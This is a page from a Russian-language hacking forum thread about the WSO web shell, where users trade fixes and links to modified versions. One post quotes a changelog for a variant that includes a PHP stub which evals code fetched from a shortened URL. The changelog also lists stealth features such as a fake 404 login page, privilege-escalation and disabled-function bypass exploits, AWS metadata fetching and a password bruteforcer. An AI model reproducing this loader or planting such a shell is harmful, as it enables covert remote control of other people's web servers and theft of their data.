WSO 2.5 (web shell) - Страница 26

billar · 14.12.2020, 01:56

Цитата:

Сообщение от Replace

Но при переходе в любую директорию просит пароль. При вводе пароля остаюсь на том же месте. Как это можно исправить?

В JS надо удалить функцию base64 заменив ее на btoa().

yourcatispwned · 14.11.2021, 01:43

Цитата:

Сообщение от Pirat

Выложил свой старый webshell wso в открытый доступ, мне он пока не нужен.

Изменения:
Теперь webshell сложно обнаружить даже если зайти по файлу wso.php.
Что бы войти нужно нажать один раз Tab и ввести пароль "admin" иначе вы будете смотреть на оригинальную страницу ошибки 404. Ошибка всегда уникальная в зависимости от сайта, wso использует оригинальные ошибки сайта.
Удален устаревший код sql, вырезан полностью, но вы можете подключить adminer для доступа к базе данных.
Исправлен дизайн hard_linux
Добавлен анонимайзер
Добавлены имена забытых авторов, если кого то забыли, напишите об этом.
https://github.com/twepl/wso/

Есть у кого этот шелл?( Был у меня, да потерялся(

Aels · 31.12.2021, 04:16

Добавлю уж свой вариант.
https://github.com/aels/wso-ng/blob/main/wso-ng.php

Цитата:

can now hook password when loaded via stub <?php eval(substr(file_get_contents('https://bit.ly/get-wso-ng?pass=ed78a48738eb97ffb5624741bdf391c3'), 5)); ?>, and will use it instead of hardcoded one
all subfile downloads are now cached in /tmp and zipped
login page show natural site "404 not found" page. Just type password and press Enter, cuz password field hidden offscreen, but focused already.
new breadcrumbs navigation panel. Must be much more useful.
all files\dirs are now highlighted as their edit\view rights
go to file\path right from the breadcrumbs field
add fastCGI exploit to auto-elevate & bypass disabled functions when possible
add php add-filter exploit to bypass disabled functions and gain console execution when possible
ajax interaction now is default
Ctrl+Enter on any field to Save\Run
added "Fetch AWS metadata" command to bookmarks
added hotlink to "Linux Exploit Suggester v2" by default.
added VirusTotal integration, to autocheck IP reputation.
added https://securitytrails.com integration, to show neighbors on same IP.
added ip-info integration to show domains on same server
added reverse ip check, to show real IP, and not local.
added memory, cores and load average info to top bar.
click on IP to copy it
added list of open ports & sockets to Sec. Info section. Works ever if no console priveleges available, thru fsock.
added support for phpRedis in Sec. Info section.
reworked "Userful" section. Works thru limits of open basedir now.
you can touch files right in file list of file manager now.
fast copy name\path to clipboard by click.
neat syntax highlighting everywhere.
neat PHP code editing with autoindent support.
default top1000 password list (https://bit.ly/top1kpass) in "Bruteforce" section.

Опции темы	Поиск в этой теме
Версия для печати Отправить по электронной почте	Поиск в этой теме: Расширенный поиск
Опции просмотра
Линейный вид Комбинированный вид Древовидный вид